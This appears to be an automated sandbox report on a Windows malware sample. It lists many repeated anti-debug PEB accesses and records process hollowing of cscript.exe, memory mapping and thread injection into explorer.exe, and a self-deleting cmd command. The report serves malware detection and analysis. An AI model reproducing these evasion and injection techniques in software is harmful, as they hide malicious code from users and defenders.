          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]5_2_01061C06
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]5_2_01061C06
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]5_2_01061C06
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]5_2_01061C06
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]5_2_01061C06
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]5_2_01061C06
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]5_2_01061C06
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01026C0A mov eax, dword ptr fs:[00000030h]5_2_01026C0A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01026C0A mov eax, dword ptr fs:[00000030h]5_2_01026C0A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01026C0A mov eax, dword ptr fs:[00000030h]5_2_01026C0A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01026C0A mov eax, dword ptr fs:[00000030h]5_2_01026C0A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0107740D mov eax, dword ptr fs:[00000030h]5_2_0107740D
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0107740D mov eax, dword ptr fs:[00000030h]5_2_0107740D
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0107740D mov eax, dword ptr fs:[00000030h]5_2_0107740D
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01074015 mov eax, dword ptr fs:[00000030h]5_2_01074015
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01074015 mov eax, dword ptr fs:[00000030h]5_2_01074015
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01027016 mov eax, dword ptr fs:[00000030h]5_2_01027016
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01027016 mov eax, dword ptr fs:[00000030h]5_2_01027016
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01027016 mov eax, dword ptr fs:[00000030h]5_2_01027016
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAB1E1 mov eax, dword ptr fs:[00000030h]5_2_00FAB1E1
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAB1E1 mov eax, dword ptr fs:[00000030h]5_2_00FAB1E1
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAB1E1 mov eax, dword ptr fs:[00000030h]5_2_00FAB1E1
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FBD5E0 mov eax, dword ptr fs:[00000030h]5_2_00FBD5E0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FBD5E0 mov eax, dword ptr fs:[00000030h]5_2_00FBD5E0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD1DB5 mov eax, dword ptr fs:[00000030h]5_2_00FD1DB5
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD1DB5 mov eax, dword ptr fs:[00000030h]5_2_00FD1DB5
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD1DB5 mov eax, dword ptr fs:[00000030h]5_2_00FD1DB5
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0103C450 mov eax, dword ptr fs:[00000030h]5_2_0103C450
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0103C450 mov eax, dword ptr fs:[00000030h]5_2_0103C450
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD35A1 mov eax, dword ptr fs:[00000030h]5_2_00FD35A1
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD61A0 mov eax, dword ptr fs:[00000030h]5_2_00FD61A0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD61A0 mov eax, dword ptr fs:[00000030h]5_2_00FD61A0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDFD9B mov eax, dword ptr fs:[00000030h]5_2_00FDFD9B
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDFD9B mov eax, dword ptr fs:[00000030h]5_2_00FDFD9B
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD2990 mov eax, dword ptr fs:[00000030h]5_2_00FD2990
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA2D8A mov eax, dword ptr fs:[00000030h]5_2_00FA2D8A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA2D8A mov eax, dword ptr fs:[00000030h]5_2_00FA2D8A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA2D8A mov eax, dword ptr fs:[00000030h]5_2_00FA2D8A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA2D8A mov eax, dword ptr fs:[00000030h]5_2_00FA2D8A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA2D8A mov eax, dword ptr fs:[00000030h]5_2_00FA2D8A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01071074 mov eax, dword ptr fs:[00000030h]5_2_01071074
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01062073 mov eax, dword ptr fs:[00000030h]5_2_01062073
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDA185 mov eax, dword ptr fs:[00000030h]5_2_00FDA185
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD2581 mov eax, dword ptr fs:[00000030h]5_2_00FD2581
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD2581 mov eax, dword ptr fs:[00000030h]5_2_00FD2581
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD2581 mov eax, dword ptr fs:[00000030h]5_2_00FD2581
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD2581 mov eax, dword ptr fs:[00000030h]5_2_00FD2581
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FCC182 mov eax, dword ptr fs:[00000030h]5_2_00FCC182
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01023884 mov eax, dword ptr fs:[00000030h]5_2_01023884
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01023884 mov eax, dword ptr fs:[00000030h]5_2_01023884
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAB171 mov eax, dword ptr fs:[00000030h]5_2_00FAB171
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAB171 mov eax, dword ptr fs:[00000030h]5_2_00FAB171
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FCC577 mov eax, dword ptr fs:[00000030h]5_2_00FCC577
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FCC577 mov eax, dword ptr fs:[00000030h]5_2_00FCC577
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAC962 mov eax, dword ptr fs:[00000030h]5_2_00FAC962
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FC7D50 mov eax, dword ptr fs:[00000030h]5_2_00FC7D50
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FCB944 mov eax, dword ptr fs:[00000030h]5_2_00FCB944
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FCB944 mov eax, dword ptr fs:[00000030h]5_2_00FCB944
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE3D43 mov eax, dword ptr fs:[00000030h]5_2_00FE3D43
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD4D3B mov eax, dword ptr fs:[00000030h]5_2_00FD4D3B
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD4D3B mov eax, dword ptr fs:[00000030h]5_2_00FD4D3B
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD4D3B mov eax, dword ptr fs:[00000030h]5_2_00FD4D3B
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD513A mov eax, dword ptr fs:[00000030h]5_2_00FD513A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD513A mov eax, dword ptr fs:[00000030h]5_2_00FD513A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAAD30 mov eax, dword ptr fs:[00000030h]5_2_00FAAD30
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB3D34 mov eax, dword ptr fs:[00000030h]5_2_00FB3D34
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB3D34 mov eax, dword ptr fs:[00000030h]5_2_00FB3D34
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB3D34 mov eax, dword ptr fs:[00000030h]5_2_00FB3D34
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB3D34 mov eax, dword ptr fs:[00000030h]5_2_00FB3D34
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB3D34 mov eax, dword ptr fs:[00000030h]5_2_00FB3D34
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB3D34 mov eax, dword ptr fs:[00000030h]5_2_00FB3D34
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB3D34 mov eax, dword ptr fs:[00000030h]5_2_00FB3D34
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB3D34 mov eax, dword ptr fs:[00000030h]5_2_00FB3D34
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB3D34 mov eax, dword ptr fs:[00000030h]5_2_00FB3D34
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB3D34 mov eax, dword ptr fs:[00000030h]5_2_00FB3D34
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB3D34 mov eax, dword ptr fs:[00000030h]5_2_00FB3D34
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB3D34 mov eax, dword ptr fs:[00000030h]5_2_00FB3D34
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB3D34 mov eax, dword ptr fs:[00000030h]5_2_00FB3D34
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01078CD6 mov eax, dword ptr fs:[00000030h]5_2_01078CD6
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0103B8D0 mov eax, dword ptr fs:[00000030h]5_2_0103B8D0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0103B8D0 mov ecx, dword ptr fs:[00000030h]5_2_0103B8D0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0103B8D0 mov eax, dword ptr fs:[00000030h]5_2_0103B8D0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0103B8D0 mov eax, dword ptr fs:[00000030h]5_2_0103B8D0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0103B8D0 mov eax, dword ptr fs:[00000030h]5_2_0103B8D0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0103B8D0 mov eax, dword ptr fs:[00000030h]5_2_0103B8D0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FC4120 mov eax, dword ptr fs:[00000030h]5_2_00FC4120
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FC4120 mov eax, dword ptr fs:[00000030h]5_2_00FC4120
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FC4120 mov eax, dword ptr fs:[00000030h]5_2_00FC4120
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FC4120 mov eax, dword ptr fs:[00000030h]5_2_00FC4120
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FC4120 mov ecx, dword ptr fs:[00000030h]5_2_00FC4120
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01026CF0 mov eax, dword ptr fs:[00000030h]5_2_01026CF0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01026CF0 mov eax, dword ptr fs:[00000030h]5_2_01026CF0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01026CF0 mov eax, dword ptr fs:[00000030h]5_2_01026CF0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA9100 mov eax, dword ptr fs:[00000030h]5_2_00FA9100
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA9100 mov eax, dword ptr fs:[00000030h]5_2_00FA9100
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA9100 mov eax, dword ptr fs:[00000030h]5_2_00FA9100
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_010614FB mov eax, dword ptr fs:[00000030h]5_2_010614FB
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0107070D mov eax, dword ptr fs:[00000030h]5_2_0107070D
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0107070D mov eax, dword ptr fs:[00000030h]5_2_0107070D
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0103FF10 mov eax, dword ptr fs:[00000030h]5_2_0103FF10
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0103FF10 mov eax, dword ptr fs:[00000030h]5_2_0103FF10
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB76E2 mov eax, dword ptr fs:[00000030h]5_2_00FB76E2
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD2AE4 mov eax, dword ptr fs:[00000030h]5_2_00FD2AE4
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0106131B mov eax, dword ptr fs:[00000030h]5_2_0106131B
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD16E0 mov ecx, dword ptr fs:[00000030h]5_2_00FD16E0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD36CC mov eax, dword ptr fs:[00000030h]5_2_00FD36CC
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD2ACB mov eax, dword ptr fs:[00000030h]5_2_00FD2ACB
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE8EC7 mov eax, dword ptr fs:[00000030h]5_2_00FE8EC7
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FBAAB0 mov eax, dword ptr fs:[00000030h]5_2_00FBAAB0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FBAAB0 mov eax, dword ptr fs:[00000030h]5_2_00FBAAB0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDFAB0 mov eax, dword ptr fs:[00000030h]5_2_00FDFAB0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01078B58 mov eax, dword ptr fs:[00000030h]5_2_01078B58
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA52A5 mov eax, dword ptr fs:[00000030h]5_2_00FA52A5
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA52A5 mov eax, dword ptr fs:[00000030h]5_2_00FA52A5
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA52A5 mov eax, dword ptr fs:[00000030h]5_2_00FA52A5
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA52A5 mov eax, dword ptr fs:[00000030h]5_2_00FA52A5
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA52A5 mov eax, dword ptr fs:[00000030h]5_2_00FA52A5
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDD294 mov eax, dword ptr fs:[00000030h]5_2_00FDD294
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDD294 mov eax, dword ptr fs:[00000030h]5_2_00FDD294
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01078F6A mov eax, dword ptr fs:[00000030h]5_2_01078F6A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE927A mov eax, dword ptr fs:[00000030h]5_2_00FE927A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0105D380 mov ecx, dword ptr fs:[00000030h]5_2_0105D380
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0106138A mov eax, dword ptr fs:[00000030h]5_2_0106138A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FCAE73 mov eax, dword ptr fs:[00000030h]5_2_00FCAE73
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FCAE73 mov eax, dword ptr fs:[00000030h]5_2_00FCAE73
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FCAE73 mov eax, dword ptr fs:[00000030h]5_2_00FCAE73
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FCAE73 mov eax, dword ptr fs:[00000030h]5_2_00FCAE73
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FCAE73 mov eax, dword ptr fs:[00000030h]5_2_00FCAE73
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB766D mov eax, dword ptr fs:[00000030h]5_2_00FB766D
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01027794 mov eax, dword ptr fs:[00000030h]5_2_01027794
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01027794 mov eax, dword ptr fs:[00000030h]5_2_01027794
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01027794 mov eax, dword ptr fs:[00000030h]5_2_01027794
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01075BA5 mov eax, dword ptr fs:[00000030h]5_2_01075BA5
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA9240 mov eax, dword ptr fs:[00000030h]5_2_00FA9240
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA9240 mov eax, dword ptr fs:[00000030h]5_2_00FA9240
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA9240 mov eax, dword ptr fs:[00000030h]5_2_00FA9240
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA9240 mov eax, dword ptr fs:[00000030h]5_2_00FA9240
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB7E41 mov eax, dword ptr fs:[00000030h]5_2_00FB7E41
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB7E41 mov eax, dword ptr fs:[00000030h]5_2_00FB7E41
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB7E41 mov eax, dword ptr fs:[00000030h]5_2_00FB7E41
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB7E41 mov eax, dword ptr fs:[00000030h]5_2_00FB7E41
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB7E41 mov eax, dword ptr fs:[00000030h]5_2_00FB7E41
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB7E41 mov eax, dword ptr fs:[00000030h]5_2_00FB7E41
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_010253CA mov eax, dword ptr fs:[00000030h]5_2_010253CA
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_010253CA mov eax, dword ptr fs:[00000030h]5_2_010253CA
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE4A2C mov eax, dword ptr fs:[00000030h]5_2_00FE4A2C
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE4A2C mov eax, dword ptr fs:[00000030h]5_2_00FE4A2C
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAE620 mov eax, dword ptr fs:[00000030h]5_2_00FAE620
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FC3A1C mov eax, dword ptr fs:[00000030h]5_2_00FC3A1C
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDA61C mov eax, dword ptr fs:[00000030h]5_2_00FDA61C
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDA61C mov eax, dword ptr fs:[00000030h]5_2_00FDA61C
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA5210 mov eax, dword ptr fs:[00000030h]5_2_00FA5210
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA5210 mov ecx, dword ptr fs:[00000030h]5_2_00FA5210
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA5210 mov eax, dword ptr fs:[00000030h]5_2_00FA5210
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA5210 mov eax, dword ptr fs:[00000030h]5_2_00FA5210
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAAA16 mov eax, dword ptr fs:[00000030h]5_2_00FAAA16
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAAA16 mov eax, dword ptr fs:[00000030h]5_2_00FAAA16
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB8A0A mov eax, dword ptr fs:[00000030h]5_2_00FB8A0A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAC600 mov eax, dword ptr fs:[00000030h]5_2_00FAC600
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAC600 mov eax, dword ptr fs:[00000030h]5_2_00FAC600
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAC600 mov eax, dword ptr fs:[00000030h]5_2_00FAC600
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD8E00 mov eax, dword ptr fs:[00000030h]5_2_00FD8E00
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE37F5 mov eax, dword ptr fs:[00000030h]5_2_00FE37F5
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061608 mov eax, dword ptr fs:[00000030h]5_2_01061608
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FCDBE9 mov eax, dword ptr fs:[00000030h]5_2_00FCDBE9
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD03E2 mov eax, dword ptr fs:[00000030h]5_2_00FD03E2
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD03E2 mov eax, dword ptr fs:[00000030h]5_2_00FD03E2
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD03E2 mov eax, dword ptr fs:[00000030h]5_2_00FD03E2
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD03E2 mov eax, dword ptr fs:[00000030h]5_2_00FD03E2
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD03E2 mov eax, dword ptr fs:[00000030h]5_2_00FD03E2
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD03E2 mov eax, dword ptr fs:[00000030h]5_2_00FD03E2
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0105FE3F mov eax, dword ptr fs:[00000030h]5_2_0105FE3F
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0106AE44 mov eax, dword ptr fs:[00000030h]5_2_0106AE44
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0106AE44 mov eax, dword ptr fs:[00000030h]5_2_0106AE44
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD4BAD mov eax, dword ptr fs:[00000030h]5_2_00FD4BAD
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD4BAD mov eax, dword ptr fs:[00000030h]5_2_00FD4BAD
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD4BAD mov eax, dword ptr fs:[00000030h]5_2_00FD4BAD
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0106EA55 mov eax, dword ptr fs:[00000030h]5_2_0106EA55
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01034257 mov eax, dword ptr fs:[00000030h]5_2_01034257
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0105B260 mov eax, dword ptr fs:[00000030h]5_2_0105B260
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0105B260 mov eax, dword ptr fs:[00000030h]5_2_0105B260
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01078A62 mov eax, dword ptr fs:[00000030h]5_2_01078A62
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD2397 mov eax, dword ptr fs:[00000030h]5_2_00FD2397
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDB390 mov eax, dword ptr fs:[00000030h]5_2_00FDB390
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB8794 mov eax, dword ptr fs:[00000030h]5_2_00FB8794
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB1B8F mov eax, dword ptr fs:[00000030h]5_2_00FB1B8F
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cscript.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_00409B50 LdrLoadDll, 5_2_00409B50
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeSection unmapped: C:\Windows\SysWOW64\cscript.exe base address: 840000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeThread register set: target process: 3352Jump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeThread register set: target process: 3352Jump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess created: C:\Users\user\Desktop\CtTYTpaAKA.exe C:\Users\user\Desktop\CtTYTpaAKA.exeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\CtTYTpaAKA.exe'Jump to behavior
